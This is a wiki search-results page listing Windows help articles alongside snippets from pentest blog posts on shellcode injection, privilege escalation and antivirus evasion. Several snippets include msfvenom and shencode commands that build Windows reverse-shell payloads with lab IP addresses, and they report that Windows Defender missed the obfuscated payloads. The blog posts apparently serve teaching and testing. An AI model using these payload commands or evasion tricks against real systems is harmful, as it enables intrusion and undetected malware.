Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Passende Seitennamen:
- Windows
- Windows10
- Windows11
- Windows Bluescreen Analyse
- Windows - Konsole und Befehle
- Erstellen von Screenshots
- Kostenlos PDF Dateien erstellen
- Firefox About Befehle
- HTML5 Videos nicht automatisch abspielen
- Firefox Miniaturansicht wiederherstellen
- Sicherheit im Netz
- Taskleiste linksbündig ausrichten unter Windows 11
- Auslagerungsdatei unter Windows verschieben
- Netzwerkfreigaben in der Kommandozeile
- Eigene Namen im LAN anlegen
- Numlock beim Windows Start aktivieren
- Startpartition reparieren
- Microsoft Konfigurationstool starten
- Registry Editor starten
- Dienste Tool
- Bereits gelöschte Dateien sicher überschreiben
- Desktop anzeigen - Verknüpfung erstellen
- Windows Wiederherstellungspunkte
- Benutzerkontensteuerung (UAC) komplett deaktivieren
- Erstellen eines bootfähigen USB Sticks
- Registry zu einem früherem Zeitpunkt zurücksetzen
- Reparatur von Windows 10 ausführen
- Privilegien-Eskalation: Windows-Admin dank Linux
- Windows
- Windows10
- Windows11
- Deactivate automatic data carrier check
- Security on the net
- Windows Portal
- Left-align taskbar under Windows 11
- NTLDR missing Error message
- Start Microsoft configuration tool
- Start Registry Editor
- Windows restore points
- Disable User Account Control (UAC) completely
- Creating a bootable USB stick
- Reset the registry at an earlier point in time
- Execute repair of Windows 10
- index
- Privilege escalation: Windows admin thanks to Linux
- index
- Execute repair of Windows 10
- Left-align taskbar under Windows 11
- Portal: Windows Essentials
- Start Registry Editor
- Securely overwrite files that have already been deleted
- Provide Windows updates on the installation DVD
- index
- Windows Security - Basics
- User account control under Windows Vista
- Move swap file under XP
- XP takes a very long time to shut down
- Event log cannot be opened
- Windows XP Mode for Windows 7 Home
Volltextergebnisse:
- Navigation
- ux]] * [[Software-overview|Software]] * [[tag:windows|Windows]] * [[Archiv]]\\ ==== About ==== * [[discussion:index|Feedback]] <nodisp psycore> /* BROKEN
- Obfuscation: polymorphic in-memory decoder @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: polymorphic in-memor... pile it. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned ... on tests. During my test, even the Metasploit payload was not detected by Windows Defender. ~~DISCUSSION~~
- Obfuscation: polymorpher In-Memory Decoder @it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog deutsch}} ====== Obfuscation: polymorpher In-Memor... ilieren. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned ... ährend meines Tests wurde selbst das Metasploit Payload nicht vom Windows Defender erkannt. ~~DISCUSSION~~
- Reset the registry at an earlier point in time @en:windows
- {{tag>windows10 windows11 registry backup english}} ====== Reset the registry at an earlier point in time ====== ===== Problem description ===== If Windows can no longer log on correctly or logs off again ... e the old registry ===== Now go to the folder C:\Windows\system32\config and rename the following files:
- Registry zu einem früherem Zeitpunkt zurücksetzen @windows
- {{tag>windows10 windows11 registry backup deutsch}} ====== Registry zu einem früherem Zeitpunkt zurücksetzen ====== ===== Problembeschreibung ===== Kann Windows sich nicht mehr richtig anmelden, oder meldet sic... und sichern ===== Nun geht man in den Ordner C:\Windows\system32\config und benennt folgende Dateien um:
- Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: Disguise shellcode a... hat I used for testing was immediately blocked by Windows Defender. I therefore had to adapt the loader and... yption or encoding. This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT
- Obfuscation: Shellcode als UUIDs tarnen @it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog deutsch}} ====== Obfuscation: Shellcode als UUIDs ... ode, die ich hierbei zum Testen nutzte, wurde vom Windows Defender sofort blockiert. Somit musste ich Loade... bzw. Enkodierung. Dieses wird in der Regel durch Windows Defender erkannt. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT
- Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
- {{tag>it-security windows linux blog english}} ====== Privilege escalation: Windows admin thanks to Linux ====== In this tutorial, ... ll show you how to secure administrator rights on Windows PCs using a live boot CD. We will simulate two sc... ystem. \\ \\ ===== Initial situation ===== On a Windows system, the users ''users'' and ''sysadmin'' are
- Shellcode Injection Teil 1 @it-security:blog
- {{tag>it-security windows kali pentest blog deutsch}} ====== Shellcode Injection Teil 1 ====== {{:it-secur... e in die Datei shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -... ocess-injection.cpp> #include <stdio.h> #include <Windows.h> //shell.c unsigned const char payload[] = "\... Shellcode im Raw Format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -
- Shellcode Injection Teil 2 @it-security:blog
- {{tag>it-security windows kali pentest blog deutsch}} ====== Shellcode Injection Teil 2 ====== {{:it-secur... n. Diese Form der Injection wird in der Regel vom Windows Defender erkannt, so dass wir wieder einige Obfus... e Ausgabe erfolgt binär: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.28.126.97 LPORT=4... ithub.com/fritzone/obfy )) war direkt ein Erfolg. Windows Defender konnte die kompilierte Datei nicht mehr
- Shellcode Injection Part 4 @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 4 ====== {{it-securi... ts should be met: * Start of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ==... e address ==== Each time a process is started in Windows, modules are loaded into this process. One of these modules is our ''kernel32.dll''. Windows creates data structures in the working memory tha
- Shellcode Injection Teil 4 @it-security:blog
- {{tag>IT-Security Windows Kali pentest blog deutsch}} ====== Shellcode Injection Teil 4 ====== {{:it-secur... füllt sein: * Start von ''calc.exe'' auf einem Windows Rechner * 64-Bit Code * Vermeiden von Null-By... Adresse ==== Mit jedem Start eines Prozesses in Windows, werden Module in diesen Prozess geladen. Eines d... ''kernel32.dll''. Im Arbeitsspeicher werden durch Windows Datenstrukturen angelegt, welche alle für uns nöt
- 64-Bit Stack CheatSheet @en:it-security
- ed as follows ((https://learn.microsoft.com/de-de/windows-hardware/drivers/debugger/x64-architecture)) ((ht
- 64-Bit Stack CheatSheet @it-security
- olgt aufgebaut((https://learn.microsoft.com/de-de/windows-hardware/drivers/debugger/x64-architecture)) ((ht
- Shellcode Injection Part 2 @en:it-security:blog
- {{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 2 ====== {{it-securi... . This form of injection is usually recognised by Windows Defender, so we will again use some obfuscation m... r. The output is binary: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.28.126.97 LPORT=4... ub.com/fritzone/obfy )) was an immediate success. Windows Defender could no longer recognise the compiled f